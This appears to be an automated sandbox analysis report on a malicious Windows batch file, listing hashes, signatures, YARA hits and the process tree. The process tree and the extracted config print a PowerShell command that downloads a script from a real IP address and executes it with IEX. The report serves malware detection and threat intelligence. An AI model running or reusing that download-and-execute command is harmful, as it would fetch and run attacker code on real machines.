Analysis
max time kernel: 146s
max time network: 148s
platform: windows10_x64
resource: win10v200722
submitted: 04-08-2020 12:31
Static task: static1
Behavioral task: behavioral1
  Sample: e241deaf6f1e1d0d13589a66c942bc3b.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: e241deaf6f1e1d0d13589a66c942bc3b.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
Target: e241deaf6f1e1d0d13589a66c942bc3b.bat
Size: 216B
MD5: c79f7f4fe4b00e41b6dce691ba63a8ae
SHA1: b8f15e882ed45e2278545ad4e686e16cb1787dc3
SHA256: 2805f33e7f7992595a10507ddb57e5bcb3ed34d8b6e8dcfa984ef77c31037132
SHA512: b20d2b133be14683663d795b6c2abf5fb2b23a2b87cc9ddbba1218dbd5d9704d112d13d51e6cb62f18297c8797d2c3152501bc35f1f97af2821c19d201a40034
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: URLs
  ps1.dropper: http://185.103.242.78/pastes/e241deaf6f1e1d0d13589a66c942bc3b
Signatures
Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description | pid | process | target process):
    PID 2884 wrote to memory of 3688 | 2884 | cmd.exe | powershell.exe
    PID 2884 wrote to memory of 3688 | 2884 | cmd.exe | powershell.exe
    PID 2884 wrote to memory of 3688 | 2884 | cmd.exe | powershell.exe
Program crash (1 IoC)
  Processes (pid | pid_target | process | target process):
    724 | 3688 | WerFault.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description | pid | process):
    Token: SeRestorePrivilege | 724 | WerFault.exe
    Token: SeBackupPrivilege | 724 | WerFault.exe
    Token: SeDebugPrivilege | 724 | WerFault.exe
Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes (pid | process):
    724 | WerFault.exe (13 occurrences)
ServiceHost packer (6 IoCs)
  Detects ServiceHost packer used for .NET malware
  Processes (resource | yara_rule):
    behavioral2/memory/3688-2-0x0000000000000000-mapping.dmp | servicehost
    behavioral2/memory/3688-3-0x0000000000000000-mapping.dmp | servicehost
    behavioral2/memory/3688-4-0x0000000000000000-mapping.dmp | servicehost
    behavioral2/memory/3688-5-0x0000000000000000-mapping.dmp | servicehost
    behavioral2/memory/3688-6-0x0000000000000000-mapping.dmp | servicehost
    behavioral2/memory/3688-7-0x0000000000000000-mapping.dmp | servicehost
Processes
1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e241deaf6f1e1d0d13589a66c942bc3b.bat"
   PID: 2884
   Signatures: Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/e241deaf6f1e1d0d13589a66c942bc3b');Invoke-KXXKRQWJL;Start-Sleep -s 10000"
      PID: 3688
      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3688 -s 704
         PID: 724
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses